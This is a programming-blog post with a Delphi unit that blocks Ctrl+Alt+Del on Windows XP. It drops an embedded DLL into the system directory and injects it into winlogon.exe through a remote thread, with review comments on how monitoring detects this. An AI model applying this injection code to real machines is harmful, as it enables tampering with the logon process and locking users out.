
delphi Windows XP下屏蔽Ctrl_Alt_Del键的方法

作者:admin 来源:未知 日期:2010/4/24 10:49:54 人气: 标签:

// Calling the two procedures below is all that is needed.
// Both act on winlogon.exe and write to / delete from the system directory
// (see the unit below), so they only work from an administrative account.
procedure RunFuckCAD; // block Ctrl+Alt+Del
procedure StopFuckCAD; // stop blocking Ctrl+Alt+Del
点击下载源文件
主要代码为:

unit Fuck_CAD_Unit;

interface

uses Windows, TLHelp32,SysUtils;

// Unit-wide constants.
// MyKernelBuf is an embedded binary image that CreateKernelFile writes to disk
// and that is then loaded into the process named by Winlogon.
// NOTE(review): the array contents are elided on this page, so what the DLL
// actually does cannot be reviewed from this listing; treat it as opaque.
const
MyKernel='SnowmanLockScreenHook.Dll'; // file name the embedded DLL is written out under; can be changed
Winlogon='winlogon.exe'; // image name of the process the DLL is loaded into
MyKernelSize=9216; // byte count written from MyKernelBuf (matches the 0..9215 bounds)
MyKernelBuf:Array [0..9215] of Byte =
(
//... array contents omitted here for length; see the source file
);

procedure RunFuckCAD;
procedure StopFuckCAD;


implementation


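procedure GetDebugPrivs; // enable SeDebugPrivilege for the current process
// Opens the current process token and asks for SeDebugPrivilege to be enabled.
// The procedure reports nothing to the caller: if the token cannot be opened,
// the privilege name cannot be resolved, or the account does not hold the
// privilege, it returns silently and later cross-process calls will fail.
// Review note: SeDebugPrivilege is normally held only by administrators;
// a process enabling it shortly before opening a system process is a
// behaviour that endpoint monitoring commonly alerts on.
var
  hToken: THandle;
  tkp: TTokenPrivileges;
  retval: dword;
begin
  if not OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) then
    Exit;
  try
    // Only adjust the token when the LUID was resolved; otherwise the
    // privilege entry would be built from uninitialised stack data.
    if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid) then
    begin
      tkp.PrivilegeCount := 1;
      tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      // A TRUE return does not prove the privilege was granted
      // (GetLastError may be ERROR_NOT_ALL_ASSIGNED); not checked here
      // because the procedure has no way to report it.
      AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
    end;
  finally
    // The original never closed the token handle.
    CloseHandle(hToken);
  end;
end;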

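function NameToPID(ExeName:pchar):longword;
// Returns the process id of the first process in a Toolhelp snapshot whose
// image file name equals ExeName (case-insensitive), or 0 when there is no
// match or the snapshot could not be taken.
// If several processes share the name, only the first one enumerated is
// returned.
// Review note: the match is on the bare file name only, not on the full path
// or the session, so any process that happens to carry the same image name
// can be the one returned.
var
  hSnap: THandle;
  Entry: TProcessEntry32;
  More: Boolean;
begin
  Result := 0;
  hSnap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  // The original walked and closed the handle without checking it.
  if hSnap = INVALID_HANDLE_VALUE then
    Exit;
  try
    Entry.dwSize := SizeOf(TProcessEntry32);
    More := Process32First(hSnap, Entry);
    while More do
    begin
      if lstrcmpiA(ExeName, Entry.szExeFile) = 0 then
      begin
        Result := Entry.th32ProcessID;
        Break;
      end;
      More := Process32Next(hSnap, Entry);
    end;
  finally
    CloseHandle(hSnap);
  end;
end;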

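function GetSysPath:pchar; // no trailing path separator is appended
// Returns the Windows system directory as a newly allocated, null-terminated
// string. The buffer comes from GetMem and is owned by the caller, who should
// release it with FreeMem.
// On failure the returned string is empty rather than uninitialised memory.
var
  Buf: PChar;
  Len: UINT;
begin
  // MAX_PATH plus terminator; the original's 255 bytes is below MAX_PATH.
  GetMem(Buf, MAX_PATH + 1);
  Buf[0] := #0;
  Len := GetSystemDirectory(Buf, MAX_PATH + 1);
  // 0 means the call failed; a value above the buffer size means it did not fit.
  if (Len = 0) or (Len > MAX_PATH) then
    Buf[0] := #0;
  Result := Buf;
end;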


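procedure DelKernel;
// Deletes the dropped DLL (MyKernel) from the system directory.
// The result of DeleteFile is ignored, as in the original; the delete fails
// while the DLL is still loaded in a process.
var
  SysDir: PChar;
  DllPath: string;
begin
  SysDir := GetSysPath;
  try
    DllPath := string(SysDir) + '/' + string(MyKernel);
  finally
    // GetSysPath allocates its buffer with GetMem; the original leaked it.
    FreeMem(SysDir);
  end;
  DeleteFile(pchar(DllPath));
end;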

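function CreateKernelFile(SaveFile:String):Boolean;
// Writes the MyKernelSize bytes of MyKernelBuf to SaveFile, replacing any
// existing file (CREATE_ALWAYS). Returns True only when the file was opened
// and every byte was written.
// Review note: the caller in this unit targets the system directory, so this
// creates an executable image there; that needs administrative rights and is
// a file-creation event worth monitoring for on a managed host.
var
  hFile: THandle;
  BytesWrite: dword;
begin
  Result := False;
  hFile := CreateFile(PChar(SaveFile), GENERIC_READ or GENERIC_WRITE,
    FILE_SHARE_READ, nil, CREATE_ALWAYS, 0, 0);
  if hFile = INVALID_HANDLE_VALUE then
    Exit;
  try
    BytesWrite := 0;
    // The original reported success on a short write; require the full size.
    if WriteFile(hFile, MyKernelBuf, MyKernelSize, BytesWrite, nil) then
      Result := (BytesWrite = MyKernelSize);
  finally
    CloseHandle(hFile);
  end;
end;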

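Function GetModule(ProcessName,ModuleName:Pchar):longword;
//This is a function written by Hke.
// Checks whether the process named ProcessName has a module named ModuleName
// loaded. Returns the module handle from the Toolhelp snapshot if so, and 0
// if the process is not found, the snapshot fails, or no module matches.
// Module names are compared case-insensitively.
var
  Pid: longword;
  hModuleSnap: THandle;
  ModuleEntry: TModuleEntry32;
  More: Boolean;
begin
  Result := 0;
  Pid := NameToPID(ProcessName);
  GetDebugPrivs;
  // A process id of 0 makes CreateToolhelp32Snapshot inspect the *calling*
  // process, so the original answered for the wrong process when the target
  // was not running.
  if Pid = 0 then
    Exit;
  hModuleSnap := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, Pid);
  if hModuleSnap = INVALID_HANDLE_VALUE then
    Exit;
  try
    ModuleEntry.dwSize := SizeOf(TModuleEntry32);
    More := Module32First(hModuleSnap, ModuleEntry);
    while More do
    begin
      if lstrcmpiA(ModuleEntry.szModule, ModuleName) = 0 then
      begin
        Result := ModuleEntry.hModule;
        Break;
      end;
      More := Module32Next(hModuleSnap, ModuleEntry);
    end;
  finally
    CloseHandle(hModuleSnap);
  end;
end;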

procedure InjectKernelModule(ProcessName ,DllName: Pchar);
//This is a function written by Hke.
// Makes the process named ProcessName load the DLL named DllName: the name
// string is copied into memory allocated in that process and a remote thread
// is started there with LoadLibraryA as its entry point.
// Does nothing when GetModule reports that the DLL is already loaded.
// NOTE(review): the results of OpenProcess, VirtualAllocEx and
// WriteProcessMemory are not checked, so a failure (process not found,
// access denied) is silent and the later calls run on invalid values.
// NOTE(review): this is the classic remote-thread DLL load. A
// PROCESS_ALL_ACCESS handle to a system process followed by a remote
// allocation, a remote write and CreateRemoteThread is exactly the sequence
// endpoint monitoring looks for (for example Sysmon process-access,
// remote-thread and image-load events); expect it to be flagged or blocked
// on a protected host.
var
tmp:longword;// dummy out-parameter required by the API calls; never read
Mysize:longword;// number of bytes of the name string to copy, terminator included
Parameter:pointer;// address of the copied string (located inside the target process)
hThread:longword;
MyHandle,PID:longword;
Tkernel:pchar;// alias for DllName, used to obtain the pointer passed to WriteProcessMemory
begin
if GetModule(ProcessName , DllName)=0 then // skip if the DLL is already loaded
begin
Tkernel:= DllName;
Pid:=NameToPID(ProcessName);
GetDebugPrivs;
Myhandle:=OpenProcess(PROCESS_ALL_ACCESS, False, Pid);
// NOTE(review): the length is taken from the MyKernel constant while the bytes
// copied below come from DllName; the two agree only when the caller passes MyKernel.
Mysize:=strlen(MyKernel)+1;
Parameter:= VirtualAllocEx(Myhandle, nil, Mysize, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(Myhandle, Parameter, Pointer(Tkernel), MySize, tmp);
hThread:= CreateRemoteThread(Myhandle,nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameter, 0 , tmp);
if hThread <> 0 then
begin
WaitForSingleObject(hThread, INFINITE); // wait for the remote thread to finish
CloseHandle(hThread);
end;
VirtualFreeEx(MyHandle, Parameter, 0, MEM_RELEASE); // release the memory allocated in the target
CloseHandle(MyHandle);
end;
end;

procedure UnInjectKernelModule(ProcessName ,DllName: Pchar);
//This is a function written by Hke.
// Unloads the DLL named DllName from the process named ProcessName by
// starting a remote thread there with FreeLibrary as its entry point and the
// module handle returned by GetModule as its argument.
// Does nothing (apart from opening and closing the process handle) when
// GetModule reports the DLL is not loaded.
// NOTE(review): the OpenProcess and CreateRemoteThread results are not
// checked; on failure the wait and CloseHandle calls are made on an invalid
// handle and the DLL stays loaded without any indication to the caller.
var
tmp:longword;// dummy out-parameter required by CreateRemoteThread; never read
hThread:longword;
MyHandle,PID:longword;
ModuleEntry:longword;// module handle of the DLL inside the target, 0 if not loaded
begin
Pid:=NameToPID(ProcessName);
GetDebugPrivs;
Myhandle:=OpenProcess(PROCESS_ALL_ACCESS, False, Pid);
ModuleEntry:=GetModule(ProcessName ,DllName);
if ModuleEntry<>0 then // nothing to unload if the DLL is not loaded
begin
hThread:= CreateRemoteThread(Myhandle,nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'FreeLibrary'), pointer(ModuleEntry), 0 , tmp);
WaitForSingleObject(hThread, INFINITE); // wait for the remote thread to finish
CloseHandle(hThread);
end;
CloseHandle(MyHandle);
end;

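procedure RunFuckCAD; // exported: after this call Ctrl+Alt+Del is blocked
// Writes the embedded DLL into the system directory and then has the
// Winlogon process load it. The return value of CreateKernelFile is ignored,
// as in the original.
// Review note: this changes the behaviour of the logon process for the
// whole machine until StopFuckCAD is called; it needs administrative rights
// and will look like process tampering to host security tooling.
var
  SysDir: PChar;
  DropPath: string;
begin
  SysDir := GetSysPath;
  try
    DropPath := string(SysDir) + '/' + string(MyKernel);
  finally
    // GetSysPath allocates its buffer with GetMem; the original leaked it.
    FreeMem(SysDir);
  end;
  // Step 1: write the DLL out to the system directory.
  CreateKernelFile(DropPath);
  // Step 2: load the written DLL into the Winlogon process.
  InjectKernelModule(Winlogon, MyKernel);
end;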

procedure StopFuckCAD; // exported: stops blocking Ctrl+Alt+Del
// Reverts RunFuckCAD. The order matters: the DLL is unloaded first so that
// the file is no longer in use when it is deleted.
// NOTE(review): neither step reports failure, so a caller cannot tell
// whether the DLL was really unloaded and removed.
begin
UnInjectKernelModule(Winlogon ,MyKernel);
// unload the DLL from Winlogon
DelKernel;
// delete the DLL from the system directory
end;

end.
